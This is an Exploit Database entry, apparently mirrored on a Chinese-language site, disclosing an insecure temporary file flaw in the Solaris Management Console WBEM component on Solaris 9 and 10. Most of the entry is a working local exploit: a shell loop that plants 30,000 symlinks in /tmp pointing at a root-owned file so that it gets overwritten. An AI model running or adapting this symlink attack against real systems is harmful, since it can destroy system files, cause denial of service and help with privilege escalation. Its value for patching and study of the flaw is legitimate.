Oracle Solaris Management Console – WBEM Insecure Temporary File Creation

• Exploit Database
• 54 阅读

• 作者： Frank Stuart
  日期： 2010-07-13
• 类别：

  • local
  平台：

  • solaris
• 来源：https://www.exploit-db.com/exploits/34314/

• source: https://www.securityfocus.com/bid/41642/info
  
  The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.
  
  An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.
  
  Solaris 9 and 10 are affected.
  
   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r-- 1 root root38 Jan3 22:43 /etc/important
   $ cat /etc/important
  This is an important file!
  
  EOF